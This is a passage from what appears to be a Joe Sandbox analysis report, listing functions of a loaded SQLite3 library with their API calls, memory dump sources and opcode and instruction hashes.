                                                                                                    • Instruction ID: 711f834e703635bd855755536bc37b4438588594601a574ac263dc4f1ed9d9d9
                                                                                                    • Opcode Fuzzy Hash: 894d3fe4a5c13fcbdc955af075f664c8fb64ba095e162ff47891a0e4a8fa562b
                                                                                                    • Instruction Fuzzy Hash: C71183B49197418FCB80EF74C48491EBBE4BB95314F518D2EE8D8D7380EB75D4849B82
                                                                                                    Function 61E377D8 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_vmprintf.SQLITE3 ref: 61E377F9
                                                                                                      • Part of subcall function 61E34761: sqlite3_initialize.SQLITE3 ref: 61E34767
                                                                                                    • sqlite3_mprintf.SQLITE3 ref: 61E37823
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E3782E
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E37841
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_initializesqlite3_mprintfsqlite3_vmprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 690915108-0
                                                                                                    • Opcode ID: 5140e840f59aa24dcfa4e4e3c2b47dc5dc94a6998bdc7c2e7a0caabf0b1bc81f
                                                                                                    • Instruction ID: ce283f3fe71d747a41d694e2a3d7bc5a8b7d0a4ee9e54746729e717d6dc9f980
                                                                                                    • Opcode Fuzzy Hash: 5140e840f59aa24dcfa4e4e3c2b47dc5dc94a6998bdc7c2e7a0caabf0b1bc81f
                                                                                                    • Instruction Fuzzy Hash: 4501C871A04366DFEB509FA9C48465AFBE4EF88354F60882DE998C7340E774D891CB91
                                                                                                    Function 61E0C911 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E0C949
                                                                                                      • Part of subcall function 61E0A227: sqlite3_free.SQLITE3 ref: 61E0A248
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E0C95C
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E0C93E
                                                                                                      • Part of subcall function 61E09B75: sqlite3_mutex_enter.SQLITE3 ref: 61E09B94
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E0C98A
                                                                                                      • Part of subcall function 61E0A3BE: sqlite3_free.SQLITE3 ref: 61E0A3CF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_mutex_enter
                                                                                                    • String ID:
                                                                                                    • API String ID: 3930042888-0
                                                                                                    • Opcode ID: 904df179a7668e224f918fd304aafeeb5ff0e1223a81ee7328f15e8226897529
                                                                                                    • Instruction ID: bc18dcfe68e80a19eea6359199916cdd040fe7f6915e8254df7245af05a02b68
                                                                                                    • Opcode Fuzzy Hash: 904df179a7668e224f918fd304aafeeb5ff0e1223a81ee7328f15e8226897529
                                                                                                    • Instruction Fuzzy Hash: 86018431A046459BD710AF79D8C085EF7F4EF8431AF61886DE9898B310DB74E961CF54
                                                                                                    Function 61E182F3 Relevance: 6.0, APIs: 4, Instructions: 38stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_initialize.SQLITE3 ref: 61E18301
                                                                                                      • Part of subcall function 61E17F2E: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E17F65
                                                                                                      • Part of subcall function 61E17F2E: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E2224D), ref: 61E17F99
                                                                                                      • Part of subcall function 61E17F2E: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E182E4
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E18319
                                                                                                    • strcmp.MSVCRT ref: 61E18336
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E18347
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_configsqlite3_initializestrcmp
                                                                                                    • String ID:
                                                                                                    • API String ID: 2933023327-0
                                                                                                    • Opcode ID: c9f83a0faf603758801fbabb421117ed0296ea5b135db898802e7ae14ff2a476
                                                                                                    • Instruction ID: faf828dfce0ca56720600de7974c70245e0e1a72097d84ca82e8b35f6011c6b4
                                                                                                    • Opcode Fuzzy Hash: c9f83a0faf603758801fbabb421117ed0296ea5b135db898802e7ae14ff2a476
                                                                                                    • Instruction Fuzzy Hash: E6F0B4716093915BDB40AFE9D8C191EBBE8AF8565CF29843DEC588F309E730D84197A2
                                                                                                    Function 61E54472 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 61E5442B: sqlite3_reset.SQLITE3 ref: 61E54451
                                                                                                      • Part of subcall function 61E5442B: sqlite3_finalize.SQLITE3 ref: 61E54467
                                                                                                      • Part of subcall function 61E52C19: sqlite3_free.SQLITE3 ref: 61E52C4A
                                                                                                      • Part of subcall function 61E52C19: sqlite3_free.SQLITE3 ref: 61E52C52
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E544A7
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E5449D
                                                                                                      • Part of subcall function 61E09B75: sqlite3_mutex_enter.SQLITE3 ref: 61E09B94
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E544BB
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E544CB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_finalizesqlite3_mutex_entersqlite3_reset
                                                                                                    • String ID:
                                                                                                    • API String ID: 2080152953-0
                                                                                                    • Opcode ID: 6ce60e905343abc0b78aa8cff968bbed296db10aea5e044be2960f9ac95dbff7
                                                                                                    • Instruction ID: 88fe6ac9ef442a7f8d87765633a4e023ef3038943c0b6d2e57693bc3aeaaf634
                                                                                                    • Opcode Fuzzy Hash: 6ce60e905343abc0b78aa8cff968bbed296db10aea5e044be2960f9ac95dbff7
                                                                                                    • Instruction Fuzzy Hash: 30F04F71604B519BC760AF79D8C041ABBE4EF84369F21896DEC8A4B305D735E8218B95
                                                                                                    Function 61E366E6 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_vmprintf.SQLITE3 ref: 61E366FF
                                                                                                      • Part of subcall function 61E34761: sqlite3_initialize.SQLITE3 ref: 61E34767
                                                                                                    • sqlite3_mprintf.SQLITE3 ref: 61E3671D
                                                                                                      • Part of subcall function 61E35200: sqlite3_initialize.SQLITE3 ref: 61E35206
                                                                                                      • Part of subcall function 61E35200: sqlite3_vmprintf.SQLITE3 ref: 61E35220
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E36729
                                                                                                      • Part of subcall function 61E09B75: sqlite3_mutex_enter.SQLITE3 ref: 61E09B94
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E36731
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_freesqlite3_initializesqlite3_vmprintf$sqlite3_mprintfsqlite3_mutex_enter
                                                                                                    • String ID:
                                                                                                    • API String ID: 2126213637-0
                                                                                                    • Opcode ID: 156613ecaeae320b6523e1906321389698d9af3dfb33f631951cdc6cc24d2bea
                                                                                                    • Instruction ID: d038bec99563e89c0d6a8a97e07774fb4b8c784935cd4aed342eefdbbd0aa09c
                                                                                                    • Opcode Fuzzy Hash: 156613ecaeae320b6523e1906321389698d9af3dfb33f631951cdc6cc24d2bea
                                                                                                    • Instruction Fuzzy Hash: A1F05E726097656B9701AFAD848045EBFE8EFC86A4F65852EF88CC7300E770C950CB92
                                                                                                    Function 61E52FE5 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 61E52FC6: sqlite3_blob_close.SQLITE3 ref: 61E52FD4
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E5300C
                                                                                                      • Part of subcall function 61E09B75: sqlite3_mutex_enter.SQLITE3 ref: 61E09B94
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E53017
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E53022
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E5302A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_blob_closesqlite3_mutex_enter
                                                                                                    • String ID:
                                                                                                    • API String ID: 1319845086-0
                                                                                                    • Opcode ID: 3cd308cae803230d1d11a15ee65eb6c38ce9ef24c2d68cb457f345b4ca6ec26b
                                                                                                    • Instruction ID: c4cd6f8c843bcc694dc9c64ca953562c7e3af1a20e8320fbc32238403a79c8b5
                                                                                                    • Opcode Fuzzy Hash: 3cd308cae803230d1d11a15ee65eb6c38ce9ef24c2d68cb457f345b4ca6ec26b
                                                                                                    • Instruction Fuzzy Hash: 00F01C70504A46DBCB40FF78C4C0918B7E4AF44364F51896DE98E8B316EB71E4608B25
                                                                                                    Function 61E52B2E Relevance: 6.0, APIs: 4, Instructions: 26COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E52B47
                                                                                                      • Part of subcall function 61E09B75: sqlite3_mutex_enter.SQLITE3 ref: 61E09B94
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E52B58
                                                                                                    • sqlite3_blob_close.SQLITE3 ref: 61E52B63
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E52B6B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_blob_closesqlite3_mutex_enter
                                                                                                    • String ID:
                                                                                                    • API String ID: 1319845086-0
                                                                                                    • Opcode ID: d8574f2fdd9f093c07a5af3af3f1bd48e796f779a3298d3058542c5dbec3ee9f
                                                                                                    • Instruction ID: 0ce47152f018ed69093c44c5c397384ea75dca521a9bea5e092cfde9b4afac7a
                                                                                                    • Opcode Fuzzy Hash: d8574f2fdd9f093c07a5af3af3f1bd48e796f779a3298d3058542c5dbec3ee9f
                                                                                                    • Instruction Fuzzy Hash: 45E030B09087469FDB406FB4C4C4615BBE4AB04328FA255ACD84E8B302E775D4A0CA56
                                                                                                    Function 61E87A0B Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_initialize.SQLITE3 ref: 61E87A12
                                                                                                      • Part of subcall function 61E17F2E: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E17F65
                                                                                                      • Part of subcall function 61E17F2E: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E2224D), ref: 61E17F99
                                                                                                      • Part of subcall function 61E17F2E: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E182E4
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E87A2A
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E87A37
                                                                                                      • Part of subcall function 61E09B75: sqlite3_mutex_enter.SQLITE3 ref: 61E09B94
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E87A53
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_mutex_enter$sqlite3_mutex_leave$sqlite3_configsqlite3_freesqlite3_initialize
                                                                                                    • String ID:
                                                                                                    • API String ID: 3512769177-0
                                                                                                    • Opcode ID: fa1da1737859ad8fbe84a19fe06668406ac163d02251cd1976010062095bff19
                                                                                                    • Instruction ID: bb7c0c04687efc3011d4dd4d8eab4881cb3fdf1db4ee0e00bc7c53b09fc12a80
                                                                                                    • Opcode Fuzzy Hash: fa1da1737859ad8fbe84a19fe06668406ac163d02251cd1976010062095bff19
                                                                                                    • Instruction Fuzzy Hash: 5AE0DFB86086824BCB003FF9C48430DB7E8BB4638CF60482CD88C8B300EB75C0A48753
                                                                                                    Function 61E2A823 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 298COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free
                                                                                                    • String ID: a
                                                                                                    • API String ID: 2313487548-581836851
                                                                                                    • Opcode ID: be7135248c255126026d77538403eef326c1a9ffc0d0b92eb4420b84704a96d4
                                                                                                    • Instruction ID: ae8469b0ebcfb8117d29aff000d7f6f453b2d1f7af1f1e7dab812d11faf0805e
                                                                                                    • Opcode Fuzzy Hash: be7135248c255126026d77538403eef326c1a9ffc0d0b92eb4420b84704a96d4
                                                                                                    • Instruction Fuzzy Hash: EEE124B5A0421ACFCB05CF98D190A8EBBF1FF88314F268599E845AB765D334E851CF91
                                                                                                    Function 61E30D97 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 241COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E30F40
                                                                                                      • Part of subcall function 61E09B75: sqlite3_mutex_enter.SQLITE3 ref: 61E09B94
                                                                                                    • sqlite3_strnicmp.SQLITE3 ref: 61E31021
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_freesqlite3_mutex_entersqlite3_strnicmp
                                                                                                    • String ID: a
                                                                                                    • API String ID: 541736041-581836851
                                                                                                    • Opcode ID: 5d91cd4e17fb8bf70d5a2e940c51b3457b5e55b7f4208c35f87cd83ef823514a
                                                                                                    • Instruction ID: fbe1b512287199b1345ed966bb0b1f294f9cef6cc37af73d5a38eff432fadfee
                                                                                                    • Opcode Fuzzy Hash: 5d91cd4e17fb8bf70d5a2e940c51b3457b5e55b7f4208c35f87cd83ef823514a
                                                                                                    • Instruction Fuzzy Hash: CAB1C074A056A9DFDB14CFA8C580A8DFBF0BF88304F24846AE859AB315D775E842CF51
                                                                                                    Function 61E06E4E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 101COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_strnicmp
                                                                                                    • String ID: '$null
                                                                                                    • API String ID: 1961171630-2611297978
                                                                                                    • Opcode ID: f9f27c2ee93c3b6f25d2e7b9a2aca3eee1caaaf9c08fb658b73e6e8dd3a1bbe5
                                                                                                    • Instruction ID: 8f85213c0f1103d898b1f56984e04acc7e7e89b162424e56ba53e794ef00885e
                                                                                                    • Opcode Fuzzy Hash: f9f27c2ee93c3b6f25d2e7b9a2aca3eee1caaaf9c08fb658b73e6e8dd3a1bbe5
                                                                                                    • Instruction Fuzzy Hash: 4E31EB20A496C64FF7008DB4C465391BBD36B8D31FFF8C16CD1584A29AE636DDE64701
                                                                                                    Function 61E26F35 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_win32_is_nt.SQLITE3 ref: 61E26F6F
                                                                                                      • Part of subcall function 61E17892: InterlockedCompareExchange.KERNEL32 ref: 61E178B2
                                                                                                      • Part of subcall function 61E17892: InterlockedCompareExchange.KERNEL32 ref: 61E178F9
                                                                                                      • Part of subcall function 61E17892: InterlockedCompareExchange.KERNEL32 ref: 61E17919
                                                                                                      • Part of subcall function 61E1781C: sqlite3_win32_sleep.SQLITE3 ref: 61E17874
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E2703A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
